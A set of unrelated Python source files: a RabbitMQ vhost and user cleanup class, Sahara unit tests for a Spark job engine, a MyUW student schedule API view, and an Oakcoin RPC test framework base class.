if vhost.startswith(self.VHOST_NAME_PATTERN[:-3])
)
extra_vhosts = current_vhosts - expected_vhosts
for vhost in extra_vhosts:
self._client.delete_vhost(vhost)
def _clear_extra_users(self, tenants, agents):
"""Remove users in rabbitmq not present in the database"""
expected_usernames = self._get_rabbitmq_users(tenants).union(
self._get_rabbitmq_users(agents))
current_usernames = set(
user['name']
for user in self._client.get_users()
if user['name'].startswith(USERNAME_PATTERN[:-3])
)
extra_usernames = current_usernames - expected_usernames
for username in extra_usernames:
self._client.delete_user(username)
def _get_rabbitmq_users(self, resources):
return set(
resource.rabbitmq_username
for resource in resources
if resource.rabbitmq_username # Ignore None values
)
@ignore_not_found
def _delete_vhost(self, vhost):
self._client.delete_vhost(vhost)
@ignore_not_found
def _delete_user(self, username):
self._client.delete_user(username)
def remove_tenant_vhost_and_user(self, tenant_name):
""" Delete the vhost and user associated with a tenant name """
vhost = self.VHOST_NAME_PATTERN.format(tenant_name)
username = USERNAME_PATTERN.format(tenant_name)
self._delete_vhost(vhost)
self._delete_user(username)
def _set_agent_rabbitmq_user_permissions(self,
username,
exchange,
tenant_vhost):
# Gives the user permissions only to these resources in the tenant
# vhost:
# 1. The agent's exchange
# 2. The agent's queues (for receiving tasks and sending responses)
# 3. The exchanges of events, logs and monitoring
allowed_resources = '^(cloudify-(events-topic|logs|monitoring)|' \
'{exchange}($|_(operation|workflow|service|' \
'response_.*))$)'.format(exchange=exchange)
self._client.set_vhost_permissions(tenant_vhost,
username,
configure=allowed_resources,
write=allowed_resources,
read=allowed_resources)
# Gives configure and write permissions to the specific exchanges of
# events, logs and monitoring in the root vhost
allowed_resources = '^cloudify-(events-topic|logs|monitoring)$'
self._client.set_vhost_permissions('/',
username,
configure=allowed_resources,
write=allowed_resources)
| |
# Copyright (c) 2014 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import mock
import sahara.exceptions as ex
from sahara.service.edp.spark import engine as se
from sahara.tests.unit import base
from sahara.utils import edp
class TestSpark(base.SaharaTestCase):
def setUp(self):
super(TestSpark, self).setUp()
self.master_host = "master"
self.master_port = 7077
self.master_inst = "6789"
self.spark_pid = "12345"
self.spark_home = "/opt/spark"
self.workflow_dir = "/wfdir"
self.driver_cp = "/usr/lib/hadoop/hadoop-swift.jar"
def test_get_pid_and_inst_id(self):
'''Test parsing of job ids
Test that job ids of the form pid@instance are
split into pid and instance ids by eng._get_pid_and_inst_id()
but anything else returns empty strings
'''
eng = se.SparkJobEngine(None)
for job_id in [None, "", "@", "something", "pid@", "@instance"]:
pid, inst_id = eng._get_pid_and_inst_id(job_id)
self.assertEqual(("", ""), (pid, inst_id))
pid, inst_id = eng._get_pid_and_inst_id("pid@instance")
self.assertEqual(("pid", "instance"), (pid, inst_id))
@mock.patch('sahara.utils.general.get_instances')
def test_get_instance_if_running(self, get_instances):
'''Test retrieval of pid and instance object for running job
If the job id is valid and the job status is non-terminated,
_get_instance_if_running() should retrieve the instance
based on the inst_id and return the pid and instance.
If the job is invalid or the job is terminated, it should
return None, None.
If get_instances() throws an exception or returns an empty list,
the instance returned should be None (pid might still be set)
'''
get_instances.return_value = ["instance"]
job_exec = mock.Mock()
eng = se.SparkJobEngine("cluster")
job_exec.oozie_job_id = "invalid id"
self.assertEqual((None, None),
eng._get_instance_if_running(job_exec))
job_exec.oozie_job_id = "pid@inst_id"
for state in edp.JOB_STATUSES_TERMINATED:
job_exec.info = {'status': state}
self.assertEqual((None, None),
eng._get_instance_if_running(job_exec))
job_exec.info = {'status': edp.JOB_STATUS_RUNNING}
self.assertEqual(("pid", "instance"),
eng._get_instance_if_running(job_exec))
get_instances.assert_called_with("cluster", ["inst_id"])
# Pretend get_instances returns nothing
get_instances.return_value = []
pid, instance = eng._get_instance_if_running(job_exec)
self.assertIsNone(instance)
# Pretend get_instances throws an exception
get_instances.side_effect = Exception("some failure")
pid, instance = eng._get_instance_if_running(job_exec)
self.assertIsNone(instance)
def test_get_result_file(self):
remote = mock.Mock()
remote.execute_command.return_value = 999, "value"
job_exec = mock.Mock()
job_exec.extra = {"spark-path": "/tmp/spark-edp/Job/123"}
eng = se.SparkJobEngine("cluster")
ret, stdout = eng._get_result_file(remote, job_exec)
remote.execute_command.assert_called_with(
"cat /tmp/spark-edp/Job/123/result",
raise_when_error=False)
self.assertEqual((ret, stdout),
remote.execute_command.return_value)
def test_check_pid(self):
remote = mock.Mock()
remote.execute_command.return_value = 999, ""
eng = se.SparkJobEngine("cluster")
ret = eng._check_pid(remote, "pid")
remote.execute_command.assert_called_with("ps hp pid",
raise_when_error=False)
self.assertEqual(999, ret)
@mock.patch.object(se.SparkJobEngine,
'_get_result_file',
autospec=True)
@mock.patch.object(se.SparkJobEngine,
'_check_pid',
autospec=True)
def test_get_job_status_from_remote(self, _check_pid, _get_result_file):
'''Test retrieval of job status from remote instance
If the process is present, status is RUNNING
If the process is not present, status depends on the result file
If the result file is missing, status is DONEWITHERROR
'''
eng = se.SparkJobEngine("cluster")
job_exec = mock.Mock()
remote = mock.Mock()
# Pretend process is running
_check_pid.return_value = 0
status = eng._get_job_status_from_remote(remote, "pid", job_exec)
_check_pid.assert_called_with(eng, remote, "pid")
self.assertEqual({"status": edp.JOB_STATUS_RUNNING}, status)
# Pretend process ended and result file contains 0 (success)
_check_pid.return_value = 1
_get_result_file.return_value = 0, "0"
status = eng._get_job_status_from_remote(remote, "pid", job_exec)
self.assertEqual({"status": edp.JOB_STATUS_SUCCEEDED}, status)
# Pretend process ended and result file contains 1 (success)
_get_result_file.return_value = 0, "1"
status = eng._get_job_status_from_remote(remote, "pid", job_exec)
self.assertEqual({"status": edp.JOB_STATUS_DONEWITHERROR}, status)
# Pretend process ended and result file contains 130 (killed)
_get_result_file.return_value = 0, "130"
status = eng._get_job_status_from_remote(remote, "pid", job_exec)
self.assertEqual({"status": edp.JOB_STATUS_KILLED}, status)
# Pretend process ended and result file contains -2 (killed)
_get_result_file.return_value = 0, "-2"
status = eng._get_job_status_from_remote(remote, "pid", job_exec)
self.assertEqual({"status": edp.JOB_STATUS_KILLED}, status)
# Pretend process ended and result file is missing
_get_result_file.return_value = 1, ""
status = eng._get_job_status_from_remote(remote, "pid", job_exec)
self.assertEqual({"status": edp.JOB_STATUS_DONEWITHERROR}, status)
@mock.patch.object(se.SparkJobEngine,
'_get_job_status_from_remote',
autospec=True)
@mock.patch.object(se.SparkJobEngine,
'_get_instance_if_running',
autospec=True)
@mock.patch('sahara.utils.remote.get_remote')
def test_get_job_status(self,
get_remote,
_get_instance_if_running,
_get_job_status_from_remote):
# This is to mock "with remote.get_remote(instance) as r"
remote_instance = mock.Mock()
get_remote.return_value.__enter__ = mock.Mock(
return_value=remote_instance)
# Pretend instance is not returned
_get_instance_if_running.return_value = "pid", None
job_exec = mock.Mock()
eng = se.SparkJobEngine("cluster")
status = eng.get_job_status(job_exec)
self.assertIsNone(status)
# Pretend we have an instance
_get_instance_if_running.return_value = "pid", "instance"
_get_job_status_from_remote.return_value = {"status":
edp.JOB_STATUS_RUNNING}
status = eng.get_job_status(job_exec)
_get_job_status_from_remote.assert_called_with(eng,
remote_instance,
"pid", job_exec)
self.assertEqual({"status": edp.JOB_STATUS_RUNNING}, status)
@mock.patch.object(se.SparkJobEngine,
'_get_instance_if_running',
autospec=True,
return_value=(None, None))
@mock.patch('sahara.utils.remote.get_remote')
def test_cancel_job_null_or_done(self,
get_remote,
_get_instance_if_running):
'''Test cancel_job() when instance is None
Test that cancel_job() returns None and does not try to
retrieve a remote instance if _get_instance_if_running() returns None
'''
eng = se.SparkJobEngine("cluster")
job_exec = mock.Mock()
self.assertIsNone(eng.cancel_job(job_exec))
self.assertTrue(_get_instance_if_running.called)
self.assertFalse(get_remote.called)
@mock.patch.object(se.SparkJobEngine,
'_get_job_status_from_remote',
autospec=True,
return_value={"status": edp.JOB_STATUS_KILLED})
@mock.patch.object(se.SparkJobEngine,
'_get_instance_if_running',
autospec=True,
return_value=("pid", "instance"))
@mock.patch('sahara.utils.remote.get_remote')
def test_cancel_job(self,
get_remote,
_get_instance_if_running,
_get_job_status_from_remote):
'''Test cancel_job() with a valid instance
For a valid instance, test that cancel_job:
* retrieves the remote instance
* executes the proper kill command
* retrieves the job status (because the remote command is successful)
'''
# This is to mock "with remote.get_remote(instance) as r" in cancel_job
# and to mock r.execute_command to return success
remote_instance = mock.Mock()
get_remote.return_value.__enter__ = mock.Mock(
return_value=remote_instance)
remote_instance.execute_command.return_value = (0, "standard out")
eng = se.SparkJobEngine("cluster")
job_exec = mock.Mock()
status = eng.cancel_job(job_exec)
# check that remote.get_remote was called with the result of
# eng._get_instance_if_running()
get_remote.assert_called_with("instance")
# check that execute_command was called with the proper arguments
# ("pid" was passed in)
remote_instance.execute_command.assert_called_with(
"kill -SIGINT pid",
raise_when_error=False)
# check that the job status was retrieved since the command succeeded
_get_job_status_from_remote.assert_called_with(eng,
remote_instance,
"pid", job_exec)
self.assertEqual({"status": edp.JOB_STATUS_KILLED}, status)
@mock.patch.object(se.SparkJobEngine,
'_get_job_status_from_remote',
autospec=True)
@mock.patch.object(se.SparkJobEngine,
'_get_instance_if_running',
autospec=True,
return_value=("pid", "instance"))
@mock.patch('sahara.utils.remote.get_remote')
def test_cancel_job_failed(self,
get_remote,
_get_instance_if_running,
_get_job_status_from_remote):
'''Test cancel_job() when remote command fails
For a valid instance and a failed kill command, test that cancel_job:
* retrieves the remote instance
* executes the proper kill command
* does not retrieve the job status (because the remote command failed)
'''
# This is to mock "with remote.get_remote(instance) as r"
# and to mock r.execute_command to return failure
remote_instance = mock.Mock()
get_remote.return_value.__enter__ = mock.Mock(
return_value=remote_instance)
remote_instance.execute_command.return_value = (-1, "some error")
eng = se.SparkJobEngine("cluster")
job_exec = mock.Mock()
status = eng.cancel_job(job_exec)
# check that remote.get_remote was called with the result of
# eng._get_instance_if_running
get_remote.assert_called_with("instance")
# check that execute_command was called with the proper arguments
# ("pid" was passed in)
remote_instance.execute_command.assert_called_with(
"kill -SIGINT pid",
raise_when_error=False)
# check that the job status was not retrieved since the command failed
self.assertEqual(0, _get_job_status_from_remote.called)
# check that we have nothing new to report ...
self.assertIsNone(status)
@mock.patch('sahara.service.edp.binary_retrievers.dispatch.get_raw_binary')
@mock.patch('sahara.utils.remote.get_remote')
def test_upload_job_files(self, get_remote, get_raw_binary):
main_names = ["main1", "main2", "main3"]
lib_names = ["lib1", "lib2", "lib3"]
def make_data_objects(*args):
objs = []
for name in args:
m = mock.Mock()
m.name = name
objs.append(m)
return objs
job = mock.Mock()
job.name = "job"
job.mains = make_data_objects(*main_names)
job.libs = make_data_objects(*lib_names)
# This is to mock "with remote.get_remote(instance) as r"
remote_instance = mock.Mock()
get_remote.return_value.__enter__ = mock.Mock(
return_value=remote_instance)
get_raw_binary.return_value = "data"
eng = se.SparkJobEngine("cluster")
paths, builtins = eng._upload_job_files("where", "/somedir", job, {})
self.assertEqual(["/somedir/" + n for n in main_names + lib_names],
paths)
for path in paths:
remote_instance.write_file_to.assert_any_call(path, "data")
def _make_master_instance(self, return_code=0):
master = mock.Mock()
master.execute_command.return_value = (return_code, self.spark_pid)
master.hostname.return_value = self.master_host
master.id = self.master_inst
return master
def _config_values(self, *key):
return {("Spark", "Master port", "cluster"): self.master_port,
("Spark", "Spark home", "cluster"): self.spark_home,
("Spark", "Executor extra classpath",
"cluster"): self.driver_cp}[key]
@mock.patch('sahara.conductor.API.job_execution_get')
@mock.patch('sahara.utils.remote.get_remote')
@mock.patch('sahara.plugins.spark.config_helper.get_config_value')
@mock.patch('sahara.service.edp.job_utils.create_workflow_dir')
@mock.patch('sahara.plugins.utils.get_instance')
@mock.patch('sahara.conductor.API.job_get')
@mock.patch('sahara.context.ctx', return_value="ctx")
def _setup_run_job(self, master_instance, job_configs, files,
ctx, job_get, get_instance, create_workflow_dir,
get_config_value, get_remote, job_exec_get):
def _upload_job_files(where, job_dir, job,
libs_subdir=True, job_configs=None):
paths = [os.path.join(self.workflow_dir, f) for f in files['jars']]
bltns = files.get('bltns', [])
bltns = [os.path.join(self.workflow_dir, f) for f in bltns]
return paths, bltns
job = mock.Mock()
job.name = "MyJob"
job_get.return_value = job
job_exec = mock.Mock()
job_exec.job_configs = job_configs
get_config_value.side_effect = self._config_values
create_workflow_dir.return_value = self.workflow_dir
# This is to mock "with remote.get_remote(master) as r" in run_job
get_remote.return_value.__enter__ = mock.Mock(
return_value=master_instance)
get_instance.return_value = master_instance
eng = se.SparkJobEngine("cluster")
eng._upload_job_files = mock.Mock()
eng._upload_job_files.side_effect = _upload_job_files
status = eng.run_job(job_exec)
# Check that we launch on the master node
get_instance.assert_called_with("cluster", self.master_host)
return status
def test_run_job_raise(self):
job_configs = {
'configs': {"edp.java.main_class": "org.me.myclass"},
'args': ['input_arg', 'output_arg']
}
files = {'jars': ["app.jar",
"jar1.jar",
"jar2.jar"]}
# The object representing the spark master node
# The spark-submit command will be run on this instance
master_instance = self._make_master_instance(return_code=1)
# If execute_command returns an error we should get a raise
self.assertRaises(ex.EDPError,
self._setup_run_job,
master_instance, job_configs, files)
def test_run_job_extra_jars_args(self):
job_configs = {
'configs': {"edp.java.main_class": "org.me.myclass"},
'args': ['input_arg', 'output_arg']
}
files = {'jars': ["app.jar",
"jar1.jar",
"jar2.jar"]}
# The object representing the spark master node
# The spark-submit command will be run on this instance
master_instance = self._make_master_instance()
status = self._setup_run_job(master_instance, job_configs, files)
# Check the command
master_instance.execute_command.assert_called_with(
'cd %(workflow_dir)s; '
'./launch_command %(spark_home)s/bin/spark-submit '
'--class org.me.myclass --jars jar1.jar,jar2.jar '
'--master spark://%(master_host)s:%(master_port)s '
'app.jar input_arg output_arg '
'> /dev/null 2>&1 & echo $!' % {"workflow_dir": self.workflow_dir,
"spark_home": self.spark_home,
"master_host": self.master_host,
"master_port": self.master_port})
# Check result here
self.assertEqual(("%s@%s" % (self.spark_pid, self.master_inst),
edp.JOB_STATUS_RUNNING,
{"spark-path": self.workflow_dir}), status)
def test_run_job_args(self):
job_configs = {
'configs': {"edp.java.main_class": "org.me.myclass"},
'args': ['input_arg', 'output_arg']
}
files = {'jars': ["app.jar"]}
# The object representing the spark master node
# The spark-submit command will be run on this instance
master_instance = self._make_master_instance()
status = self._setup_run_job(master_instance, job_configs, files)
# Check the command
master_instance.execute_command.assert_called_with(
'cd %(workflow_dir)s; '
'./launch_command %(spark_home)s/bin/spark-submit '
'--class org.me.myclass '
'--master spark://%(master_host)s:%(master_port)s '
'app.jar input_arg output_arg '
'> /dev/null 2>&1 & echo $!' % {"workflow_dir": self.workflow_dir,
"spark_home": self.spark_home,
"master_host": self.master_host,
"master_port": self.master_port})
# Check result here
self.assertEqual(("%s@%s" % (self.spark_pid, self.master_inst),
edp.JOB_STATUS_RUNNING,
{"spark-path": self.workflow_dir}), status)
def test_run_job(self):
job_configs = {
'configs': {"edp.java.main_class": "org.me.myclass"},
}
files = {'jars': ["app.jar"]}
# The object representing the spark master node
# The spark-submit command will be run on this instance
master_instance = self._make_master_instance()
status = self._setup_run_job(master_instance, job_configs, files)
# Check the command
master_instance.execute_command.assert_called_with(
'cd %(workflow_dir)s; '
'./launch_command %(spark_home)s/bin/spark-submit '
'--class org.me.myclass '
'--master spark://%(master_host)s:%(master_port)s '
'app.jar '
'> /dev/null 2>&1 & echo $!' % {"workflow_dir": self.workflow_dir,
"spark_home": self.spark_home,
"master_host": self.master_host,
"master_port": self.master_port})
# Check result here
self.assertEqual(("%s@%s" % (self.spark_pid, self.master_inst),
edp.JOB_STATUS_RUNNING,
{"spark-path": self.workflow_dir}), status)
def test_run_job_wrapper_extra_jars_args(self):
job_configs = {
'configs': {"edp.java.main_class": "org.me.myclass",
"edp.spark.adapt_for_swift": True},
'args': ['input_arg', 'output_arg']
}
files = {'jars': ["app.jar",
"jar1.jar",
"jar2.jar"],
'bltns': ["wrapper.jar"]}
# The object representing the spark master node
# The spark-submit command will be run on this instance
master_instance = self._make_master_instance()
status = self._setup_run_job(master_instance, job_configs, files)
# Check the command
master_instance.execute_command.assert_called_with(
'cd %(workflow_dir)s; '
'./launch_command %(spark_home)s/bin/spark-submit '
'--driver-class-path %(driver_cp)s '
'--class org.openstack.sahara.edp.SparkWrapper '
'--jars app.jar,jar1.jar,jar2.jar '
'--master spark://%(master_host)s:%(master_port)s '
'wrapper.jar spark.xml org.me.myclass input_arg output_arg '
'> /dev/null 2>&1 & echo $!' % {"workflow_dir": self.workflow_dir,
"spark_home": self.spark_home,
"driver_cp": self.driver_cp,
"master_host": self.master_host,
"master_port": self.master_port})
# Check result here
self.assertEqual(("%s@%s" % (self.spark_pid, self.master_inst),
edp.JOB_STATUS_RUNNING,
{"spark-path": self.workflow_dir}), status)
def test_run_job_wrapper_args(self):
job_configs = {
'configs': {"edp.java.main_class": "org.me.myclass",
"edp.spark.adapt_for_swift": True},
'args': ['input_arg', 'output_arg']
}
files = {'jars': ["app.jar"],
'bltns': ["wrapper.jar"]}
# The object representing the spark master node
# The spark-submit command will be run on this instance
master_instance = self._make_master_instance()
status = self._setup_run_job(master_instance, job_configs, files)
# Check the command
master_instance.execute_command.assert_called_with(
'cd %(workflow_dir)s; '
'./launch_command %(spark_home)s/bin/spark-submit '
'--driver-class-path %(driver_cp)s '
'--class org.openstack.sahara.edp.SparkWrapper '
'--jars app.jar '
'--master spark://%(master_host)s:%(master_port)s '
'wrapper.jar spark.xml org.me.myclass input_arg output_arg '
'> /dev/null 2>&1 & echo $!' % {"workflow_dir": self.workflow_dir,
"spark_home": self.spark_home,
"driver_cp": self.driver_cp,
"master_host": self.master_host,
"master_port": self.master_port})
# Check result here
self.assertEqual(("%s@%s" % (self.spark_pid, self.master_inst),
edp.JOB_STATUS_RUNNING,
{"spark-path": self.workflow_dir}), status)
def test_run_job_wrapper(self):
job_configs = {
'configs': {"edp.java.main_class": "org.me.myclass",
"edp.spark.adapt_for_swift": True}
}
files = {'jars': ["app.jar"],
'bltns': ["wrapper.jar"]}
# The object representing the spark master node
# The spark-submit command will be run on this instance
master_instance = self._make_master_instance()
status = self._setup_run_job(master_instance, job_configs, files)
# Check the command
master_instance.execute_command.assert_called_with(
'cd %(workflow_dir)s; '
'./launch_command %(spark_home)s/bin/spark-submit '
'--driver-class-path %(driver_cp)s '
'--class org.openstack.sahara.edp.SparkWrapper '
'--jars app.jar '
'--master spark://%(master_host)s:%(master_port)s '
'wrapper.jar spark.xml org.me.myclass '
'> /dev/null 2>&1 & echo $!' % {"workflow_dir": self.workflow_dir,
"spark_home": self.spark_home,
"driver_cp": self.driver_cp,
"master_host": self.master_host,
"master_port": self.master_port})
# Check result here
self.assertEqual(("%s@%s" % (self.spark_pid, self.master_inst),
edp.JOB_STATUS_RUNNING,
{"spark-path": self.workflow_dir}), status)
@mock.patch('sahara.service.edp.hdfs_helper.configure_cluster_for_hdfs')
@mock.patch('sahara.service.edp.job_utils.resolve_data_source_references')
def test_external_hdfs_config(self, resolver, configurer):
job_configs = {
'configs': {"edp.java.main_class": "org.me.myclass"},
}
files = {'jars': ["app.jar"]}
data_source = mock.Mock()
data_source.type = 'hdfs'
resolver.return_value = ([data_source], job_configs)
master_instance = self._make_master_instance()
self._setup_run_job(master_instance, job_configs, files)
configurer.assert_called_with("cluster", data_source)
| |
# Copyright 2022 UW-IT, University of Washington
# SPDX-License-Identifier: Apache-2.0
import logging
import traceback
from operator import itemgetter
from restclients_core.exceptions import InvalidNetID
from myuw.dao.campus_building import get_building_by_code
from myuw.dao.canvas import (
get_canvas_active_enrollments, set_section_canvas_course_urls)
from myuw.dao.enrollment import get_enrollment_for_term, is_ended
from myuw.dao.library import get_subject_guide_by_section
from myuw.dao.pws import get_person_of_current_user
from myuw.dao.registration import get_schedule_by_term
# from myuw.dao.schedule import filter_schedule_sections_by_summer_term
# from myuw.dao.registered_term import get_current_summer_term_in_schedule
from myuw.logger.timer import Timer
from myuw.logger.logresp import (
log_data_not_found_response, log_api_call, log_exception)
from myuw.views.api import ProtectedAPI
from myuw.views.error import data_not_found, unknown_uwnetid, handle_exception
from myuw.views import prefetch_resources
logger = logging.getLogger(__name__)
class StudClasSche(ProtectedAPI):
def dispatch(self, request, *args, **kwargs):
timer = Timer()
try:
person = get_person_of_current_user(request)
except InvalidNetID:
return unknown_uwnetid()
try:
prefetch_resources(request,
prefetch_enrollment=True,
prefetch_library=True,
prefetch_canvas=True)
return super(StudClasSche, self).dispatch(request, *args, **kwargs)
except Exception:
handle_exception(logger, timer, traceback)
def make_http_resp(self, timer, term, request, summer_term=None):
"""
@return class schedule data in json format
status 404: no schedule found (not registered)
"""
schedule = get_schedule_by_term(
request, term=term, summer_term=summer_term)
if len(schedule.sections) == 0:
log_data_not_found_response(logger, timer)
return data_not_found()
resp_data = load_schedule(request, schedule)
log_api_call(timer, request,
"Get Student Schedule {},{}".format(term.year,
term.quarter))
return self.json_response(resp_data)
def load_schedule(request, schedule):
json_data = schedule.json_data()
if schedule.term.is_summer_quarter():
json_data["summer_term"] = schedule.summer_term
if len(schedule.sections):
try:
set_section_canvas_course_urls(
get_canvas_active_enrollments(request), schedule, request)
except Exception:
log_exception(logger, 'get_canvas_active_enrollments', traceback)
pass
section_index = 0
json_data["has_eos_dates"] = False
for section in schedule.sections:
section_data = json_data["sections"][section_index]
section_index += 1
section_data["color_id"] = section.color_id
section_data['course_abbr_slug'] = section.curriculum_abbr.replace(
" ", "-")
if not section_data["section_type"]:
if len(section.meetings) > 0:
section_data["section_type"] = section.meetings[0].meeting_type
if section.is_early_fall_start():
section_data["cc_display_dates"] = True
section_data["early_fall_start"] = True
json_data["has_early_fall_start"] = True
section_data["is_ended"] = is_ended(request, section.end_date)
else:
if irregular_start_end(schedule.term, section):
section_data["cc_display_dates"] = True
section_data["is_ended"] = is_ended(request, section.end_date)
section_data["on_standby"] = (
section.registration.is_standby_status())
try:
section_data["canvas_url"] = section.canvas_course_url
except Exception:
pass
# if section.is_primary_section:
if section.sln:
try:
section_data["lib_subj_guide"] =\
get_subject_guide_by_section(section)
except Exception:
log_exception(logger,
'get_subject_guide_by_section', traceback)
pass
if section.final_exam:
final = section_data["final_exam"]
# MUWM-4728
final["is_remote"] = section.is_remote
# MUWM-596 we don't display
# if section.final_exam.building:
# building = get_building_by_code(section.final_exam.building)
# if building:
# final["longitude"] = building.longitude
# final["latitude"] = building.latitude
# final["building_name"] = building.name
# Also backfill the meeting building data
section_data["has_eos_dates"] = False
meeting_index = 0
for meeting in section.meetings:
mdata = section_data["meetings"][meeting_index]
# MUWM-4728
mdata["is_remote"] = section.is_remote
if meeting.eos_start_date is not None:
if not section_data["has_eos_dates"]:
section_data["has_eos_dates"] = True
mdata["start_end_same"] = False
if mdata["eos_start_date"] == mdata["eos_end_date"]:
mdata["start_end_same"] = True
try:
if not mdata["building_tbd"] and len(mdata["building"]):
building = get_building_by_code(mdata["building"])
if building is not None:
mdata["latitude"] = building.latitude
mdata["longitude"] = building.longitude
mdata["building_name"] = building.name
for instructor in mdata["instructors"]:
if (len(instructor["email_addresses"]) == 0 and
len(instructor["phones"]) == 0 and
len(instructor["voice_mails"]) == 0 and
len(instructor["faxes"]) == 0 and
len(instructor["touch_dials"]) == 0 and
len(instructor["addresses"]) == 0):
instructor["whitepages_publish"] = False
meeting_index += 1
except IndexError as ex:
pass
if section_data["has_eos_dates"]:
if not json_data["has_eos_dates"]:
json_data["has_eos_dates"] = True
section_data["meetings"] = sort_pce_section_meetings(
section_data["meetings"])
# MUWM-443
json_data["sections"] = sorted(json_data["sections"],
key=itemgetter('curriculum_abbr',
'course_number',
'section_id',
))
# add section index
index = 0
for section in json_data["sections"]:
section["index"] = index
index = index + 1
return json_data
def irregular_start_end(term, section):
if section.start_date is None or section.end_date is None:
return False
if section.is_summer_a_term():
return (term.first_day_quarter != section.start_date or
term.aterm_last_date != section.end_date)
if section.is_summer_b_term():
return (term.bterm_first_date != section.start_date or
term.last_day_instruction != section.end_date)
return (term.first_day_quarter != section.start_date or
term.last_final_exam_date != section.end_date) # MUWM-4863
def sort_pce_section_meetings(section_meetings_json_data):
"""
Sort meeting by eos_start_date
"""
ret_list = sorted(section_meetings_json_data,
key=itemgetter('eos_start_date'))
# add section index
index = 0
for meeting in ret_list:
meeting["index"] = index
index = index + 1
return ret_list
| |
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Oakcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Base class for RPC testing."""
from collections import deque
import logging
import optparse
import os
import sys
import shutil
import tempfile
import time
from .util import (
initialize_chain,
start_nodes,
connect_nodes_bi,
disconnect_nodes,
sync_blocks,
sync_mempools,
stop_nodes,
stop_node,
enable_coverage,
check_json_precision,
initialize_chain_clean,
PortSeed,
)
from .authproxy import JSONRPCException
class OakcoinTestFramework(object):
TEST_EXIT_PASSED = 0
TEST_EXIT_FAILED = 1
TEST_EXIT_SKIPPED = 77
def __init__(self):
self.num_nodes = 4
self.setup_clean_chain = False
self.nodes = None
def run_test(self):
raise NotImplementedError
def add_options(self, parser):
pass
def setup_chain(self):
self.log.info("Initializing test directory "+self.options.tmpdir)
if self.setup_clean_chain:
initialize_chain_clean(self.options.tmpdir, self.num_nodes)
else:
initialize_chain(self.options.tmpdir, self.num_nodes, self.options.cachedir)
def stop_node(self, num_node):
stop_node(self.nodes[num_node], num_node)
def setup_nodes(self):
extra_args = None
if hasattr(self, "extra_args"):
extra_args = self.extra_args
self.nodes = start_nodes(self.num_nodes, self.options.tmpdir, extra_args)
def setup_network(self):
self.setup_nodes()
# Connect the nodes as a "chain". This allows us
# to split the network between nodes 1 and 2 to get
# two halves that can work on competing chains.
for i in range(self.num_nodes - 1):
connect_nodes_bi(self.nodes, i, i + 1)
self.sync_all()
def split_network(self):
"""
Split the network of four nodes into nodes 0/1 and 2/3.
"""
disconnect_nodes(self.nodes[1], 2)
disconnect_nodes(self.nodes[2], 1)
self.sync_all([self.nodes[:2], self.nodes[2:]])
def sync_all(self, node_groups=None):
if not node_groups:
node_groups = [self.nodes]
[sync_blocks(group) for group in node_groups]
[sync_mempools(group) for group in node_groups]
def join_network(self):
"""
Join the (previously split) network halves together.
"""
connect_nodes_bi(self.nodes, 1, 2)
self.sync_all()
def main(self):
parser = optparse.OptionParser(usage="%prog [options]")
parser.add_option("--nocleanup", dest="nocleanup", default=False, action="store_true",
help="Leave oakcoinds and test.* datadir on exit or error")
parser.add_option("--noshutdown", dest="noshutdown", default=False, action="store_true",
help="Don't stop oakcoinds after the test execution")
parser.add_option("--srcdir", dest="srcdir", default=os.path.normpath(os.path.dirname(os.path.realpath(__file__))+"/../../../src"),
help="Source directory containing oakcoind/oakcoin-cli (default: %default)")
parser.add_option("--cachedir", dest="cachedir", default=os.path.normpath(os.path.dirname(os.path.realpath(__file__))+"/../../cache"),
help="Directory for caching pregenerated datadirs")
parser.add_option("--tmpdir", dest="tmpdir", default=tempfile.mkdtemp(prefix="test"),
help="Root directory for datadirs")
parser.add_option("-l", "--loglevel", dest="loglevel", default="INFO",
help="log events at this level and higher to the console. Can be set to DEBUG, INFO, WARNING, ERROR or CRITICAL. Passing --loglevel DEBUG will output all logs to console. Note that logs at all levels are always written to the test_framework.log file in the temporary test directory.")
parser.add_option("--tracerpc", dest="trace_rpc", default=False, action="store_true",
help="Print out all RPC calls as they are made")
parser.add_option("--portseed", dest="port_seed", default=os.getpid(), type='int',
help="The seed to use for assigning port numbers (default: current process id)")
parser.add_option("--coveragedir", dest="coveragedir",
help="Write tested RPC commands into this directory")
parser.add_option("--configfile", dest="configfile",
help="Location of the test framework config file")
self.add_options(parser)
(self.options, self.args) = parser.parse_args()
# backup dir variable for removal at cleanup
self.options.root, self.options.tmpdir = self.options.tmpdir, self.options.tmpdir + '/' + str(self.options.port_seed)
if self.options.coveragedir:
enable_coverage(self.options.coveragedir)
PortSeed.n = self.options.port_seed
os.environ['PATH'] = self.options.srcdir+":"+self.options.srcdir+"/qt:"+os.environ['PATH']
check_json_precision()
# Set up temp directory and start logging
os.makedirs(self.options.tmpdir, exist_ok=False)
self._start_logging()
success = False
try:
self.setup_chain()
self.setup_network()
self.run_test()
success = True
except JSONRPCException as e:
self.log.exception("JSONRPC error")
except AssertionError as e:
self.log.exception("Assertion failed")
except KeyError as e:
self.log.exception("Key error")
except Exception as e:
self.log.exception("Unexpected exception caught during testing")
except KeyboardInterrupt as e:
self.log.warning("Exiting after keyboard interrupt")
if not self.options.noshutdown:
self.log.info("Stopping nodes")
stop_nodes(self.nodes)
else:
self.log.info("Note: oakcoinds were not stopped and may still be running")
if not self.options.nocleanup and not self.options.noshutdown and success:
self.log.info("Cleaning up")
shutil.rmtree(self.options.tmpdir)
if not os.listdir(self.options.root):
os.rmdir(self.options.root)
else:
self.log.warning("Not cleaning up dir %s" % self.options.tmpdir)
if os.getenv("PYTHON_DEBUG", ""):
# Dump the end of the debug logs, to aid in debugging rare
# travis failures.
import glob
filenames = [self.options.tmpdir + "/test_framework.log"]
filenames += glob.glob(self.options.tmpdir + "/node*/regtest/debug.log")
MAX_LINES_TO_PRINT = 1000
for fn in filenames:
try:
with open(fn, 'r') as f:
print("From" , fn, ":")
print("".join(deque(f, MAX_LINES_TO_PRINT)))
except OSError:
print("Opening file %s failed." % fn)
traceback.print_exc()
if success:
self.log.info("Tests successful")
